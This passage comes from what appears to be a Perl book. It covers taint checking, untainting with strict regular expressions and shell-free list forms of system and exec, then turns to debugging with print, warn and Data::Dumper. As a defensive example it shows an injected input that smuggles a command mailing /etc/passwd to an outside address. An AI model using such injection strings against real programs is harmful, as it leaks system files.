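Since the new PATH value comes from a literal string in the source, Perl does not consider it tainted. The arguments in @ARGV are still tainted, and cleaning the environment does nothing to change that.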
Untainting Data
The only approved way to untaint data is to extract the good parts of it using the regular expression memory matches. By design, Perl does not taint the parts of a string that I capture in regular expression memory, even if Perl tainted the source string. Perl trusts me to write a safe regular expression. Again, it’s up to me to make it safe.
In this line of code, I untaint the first element of @ARGV to extract a filename. I use a character class to specify exactly what I want. In this case, I only want letters, digits, underscores, dots, and hyphens. I don’t want anything that might be a directory separator:
my( $file ) = $ARGV[0] =~ m/^([A-Z0-9_.-]+)$/ig;
Notice that I constrain the regular expression so it has to match the entire string, too. That is, if it contains any characters that I didn’t include in the character class, the match fails. I’m not going to try to change invalid data into good data. You’ll have to think about how you want to handle that for each situation.
It’s really easy to use this incorrectly, and some people, annoyed with the strictness of taint checking, try to untaint data without really untainting it. I can remove the taint of a variable with a trivial regular expression that matches everything:
my( $file ) = $ARGV[0] =~ m/(.*)/i;
If I want to do something like this, I might as well not even use taint checking. You might look out for this if you require your programmers to use taint checking and they want to avoid the extra work to do it right. I’ve caught this sort of statement in many code reviews, and it always surprises me that people get away with it.
I might be more diligent and still wrong, though. The character class shortcuts, \w and \W (and the POSIX version [:alpha:]), actually take their definitions from the locales. As a clever cracker, I could manipulate the locale setting in such a way as to let through the dangerous characters I want to use. Instead of the implicit range of characters from the shortcut, I should explicitly state which characters I want. I can’t be too careful. It’s easier to list the allowed characters and add ones that I miss than to list the forbidden characters, since a list of allowed characters also excludes problem characters I don’t know about yet.
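Putting that advice together, a minimal sketch of an untainting routine might look like this. The name untainted_filename and the sample inputs are hypothetical, and the allowed characters are only the ones I assume a simple filename needs:

```perl
use strict;
use warnings;

# Hypothetical helper: return a filename made only of characters I have
# explicitly allowed, or undef if anything else shows up.
sub untainted_filename {
    my( $candidate ) = @_;
    return unless defined $candidate;

    # \A and \z anchor to the very start and end of the string, so even a
    # trailing newline makes the match fail. The character class spells
    # out every allowed character instead of relying on \w.
    my( $file ) = $candidate =~ m/\A([A-Za-z0-9_.-]+)\z/;

    return $file;    # undef when the match failed
}

for my $input ( 'report-2007.txt', '../etc/passwd', '| mail joe@example.com' ) {
    my $file = untainted_filename( $input );
    print "[$input] => ", ( defined $file ? "[$file]" : 'rejected' ), "\n";
}
```

Under -T, the captured value is untainted because it comes from regular expression memory; without -T the routine still works as a plain validator. The character class still accepts the names . and .., so a real program may want to reject those separately.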
List Forms of system and exec
If I use either system or exec with a single argument, Perl looks in the argument for shell metacharacters. If it finds metacharacters, Perl passes the argument to the underlying shell for interpolation. Knowing this, I could construct a shell command that did something the program does not intend. Perhaps I have a system call that seems harmless, like the call to echo:
system( "/bin/echo $message" );
As a user of the program, I might try to craft the input so $message does more than provide an argument to echo. This string also terminates the command by using a semicolon, then starts a mail command that uses input redirection:
'Hello World!'; mail joe@example.com < /etc/passwd
Taint checking can catch this, but it’s still up to me to untaint it correctly. As I’ve shown, I can’t rely on taint checking to be safe. I can use system and exec in the list form. In that case, Perl uses the first argument as the program name and calls execvp directly, bypassing the shell and any interpolation or translation it might do:
system "/bin/echo", $message;
Using an array with system does not automatically trigger its list processing mode. If the array has only one element, system only sees one argument. If system sees any shell metacharacters in that single scalar element, it passes the whole command to the shell, special characters and all:
@args = ( "/bin/echo $message" );
system @args; # single argument form still, might go to shell

@args = ( "/bin/echo", $message );
system @args; # list form, which is fine.
To get around this special case, I can use the indirect object notation with either of these functions. Perl uses the indirect object as the name of the program to call and interprets the arguments just as it would in list form, even if it only has one element. Although this example looks like it might include $args[0] twice, it really doesn’t. It’s a special indirect object notation that turns on the list processing mode and assumes that the first argument is the command name:
system { $args[0] } @args;
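To see that the shell never gets a look at the arguments, here is a minimal sketch that wraps the indirect object form in a helper. The name run_without_shell is hypothetical, and I use $^X (the perl that is running the program) as the external command only so the example does not depend on where echo lives:

```perl
use strict;
use warnings;

# Hypothetical helper: run a command in list mode, bypassing the shell,
# and report whether it exited successfully.
sub run_without_shell {
    my( @args ) = @_;

    # The block names the program to run; @args supplies the argument
    # list, including the name the program sees for itself.
    my $status = system { $args[0] } @args;

    return $status == 0;
}

# A message that would start a second command if a shell ever parsed it.
my $message = q('Hello World!'; echo pwned);

# The child perl prints its first argument exactly as it received it.
run_without_shell( $^X, '-e', 'print "[$ARGV[0]]\n"', $message );
```

The child receives the whole message, quotes and semicolon included, as a single argument, so the trailing echo never runs as a separate command.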
Summary
Perl knows that injudiciously passing around data can cause problems and has features to give me, the programmer, ways to handle that. Taint checking is a tool that helps me find parts of the program that try to pass external data to resources outside of the program. Perl intends for me to scrutinize these data and turn them into something I can trust before I use them. Checking and scrubbing the data isn’t the only answer, and I need to program defensively using the other security features Perl offers. Even then, taint checking doesn’t ensure I’m completely safe and I still need to carefully consider the entire security environment just as I would with any other programming language.
Further Reading
Start with the perlsec documentation, which gives an overview of secure programming techniques for Perl.
The perltaint documentation gives the full details on taint checking. The entries in perlfunc for system and exec talk about their security features.
The perlfunc documentation explains everything the open built-in can do, and there is even more in perlopentut.
Although targeted toward web applications, the Open Web Application Security Project (OWASP, http://www.owasp.org) has plenty of good advice for all types of applications.
Even if you don’t want to read warnings from the Computer Emergency Response Team (CERT, http://www.cert.org) or SecurityFocus (http://www.securityfocus.com/), reading some of their advisories about perl interpreters or programs is often instructive.
Chapter 4: Debugging Perl
The standard Perl distribution comes with a debugger, although it’s really just another Perl program, perl5db.pl. Since it is just a program, I can use it as the basis for writing my own debuggers to suit my needs, or I can use the interface perl5db.pl provides to configure its actions. That’s just the beginning, though. I can write my own debugger or use one of the many debuggers created by other Perl masters.
Before You Waste Too Much Time
Before I get started, I’m almost required to remind you that Perl offers two huge debugging aids: strict and warnings. I have the most trouble with smaller programs for which I don’t think I need strict and then I make the stupid mistakes it would have caught. I spend much more time than I should have tracking down something Perl would have shown me instantly. Common mistakes seem to be the hardest for me to debug. Learn from the master: don’t discount strict or warnings for even small programs.
Now that I’ve said that, you’re going to look for it in the examples in this chapter. Just pretend those lines are there, and the book costs a bit less for the extra half a page that I saved by omitting those lines. Or if you don’t like that, just imagine that I’m running every program with both strict and warnings turned on from the command line:
$ perl -Mstrict -Mwarnings program
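As a minimal sketch of the kind of stupid mistake strict catches, I can compile a snippet with a misspelled variable name and look at what Perl says. The helper name strict_complaint and the snippet are hypothetical, and the exact wording of the message varies between Perl versions:

```perl
use strict;
use warnings;

# Hypothetical helper: compile and run a snippet with strict enabled and
# return Perl's complaint, or the empty string if there was none.
sub strict_complaint {
    my( $code ) = @_;

    # The string eval compiles $code at runtime; the trailing 1 makes a
    # successful run return a true value.
    my $ok = eval "use strict; $code; 1";

    return $ok ? '' : $@;
}

# The second statement misspells $count as $coutn.
my $snippet = 'my $count = 1; $coutn = $count + 1;';
print strict_complaint( $snippet );
```

Without strict, Perl would quietly create a new package variable named $coutn and leave $count unchanged, which is exactly the sort of thing I then waste time tracking down.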
Along with that, I have another problem that bites me much more than I should be willing to admit. Am I editing the file on the same machine I’m running it on? I have login accounts on several machines, and my favorite terminal program has tabs so I can have many sessions in one window. It’s easy to check out source from a repository and work just about anywhere. All of these nifty features conspire to get me into a situation where I’m editing a file in one window and trying to run it in another, thinking I’m on the same machine. If I’m making changes but nothing is changing in the output or behavior, it takes me longer than you’d think to figure out that the file I’m running is not the same one I’m editing. It’s stupid, but it happens. Discount nothing while debugging!
That’s a bit of a funny story, but I included it to illustrate a point: when it comes to debugging, humility is one of the principal virtues of a maintenance programmer. My best bet in debugging is to think that I’m the problem. That way, I don’t rule out anything or try to blame the problem on something else, like I often see in various Perl forums under titles such as “Possible bug in Perl.” When I suspect myself first, I’m usually right. I have a guide to solving any problem, which people have found useful for at least figuring out what might be wrong even if they can’t fix it.
The Best Debugger in the World
No matter how many different debugger applications or integrated development environments I use, I still find that plain ol’ print is my best debugger. I could load source into a debugger, set some inputs and breakpoints, and watch what happens, but often I can insert a couple of print statements and simply run the program normally. I put square brackets around the variable so I can see any leading or trailing whitespace:
print "The value of var before is [$var]\n";

#... operations affecting $var;

print "The value of var after is [$var]\n";
I don’t really have to use print because I can do the same thing with warn, which sends its output to standard error:
warn "The value of var before is [$var]";

#... operations affecting $var;

warn "The value of var after is [$var]";
Since I’ve left off the newline at the end of my warn message, it gives me the filename and line number of the warn:
The value of var before is [$var] at program.pl line 123.
If I have a complex data structure, I use Data::Dumper to show it. It handles hash and array references just fine, so I use a different character, the angle brackets in this case, to offset the output that comes from Data::Dumper:
use Data::Dumper qw(Dumper);
warn "The value of the hash is <\n" . Dumper( \%hash ) . "\n>\n";
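When I dump the same structure more than once, a couple of Data::Dumper’s configuration variables make the output easier to compare. This is a minimal sketch; the helper name dump_with_label and the sample data are hypothetical, while $Data::Dumper::Sortkeys and $Data::Dumper::Indent are documented settings of the module:

```perl
use strict;
use warnings;
use Data::Dumper qw(Dumper);

# Sort hash keys so two dumps of the same data line up with each other.
$Data::Dumper::Sortkeys = 1;

# Use a fixed, compact indentation style.
$Data::Dumper::Indent = 1;

# Hypothetical helper: wrap the dump in angle brackets with a label.
sub dump_with_label {
    my( $label, $ref ) = @_;

    return "$label is <\n" . Dumper( $ref ) . ">\n";
}

my %hash = ( name => 'Buster', tags => [ qw(cat pet) ] );
warn dump_with_label( 'The value of the hash', \%hash );
```

Because the message ends with a newline, warn leaves off the filename and line number.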
Those warn statements showed the line number of the warn statement. That’s not very useful; I already know where the warn is since I put it there! I really want to know where I called that bit of code when it became a problem. Consider a divide subroutine that returns the quotient of two numbers. For some reason, something in the code calls it in such a way that it tries to divide by zero:
sub divide
        {
        my( $numerator, $denominator ) = @_;

        return $numerator / $denominator;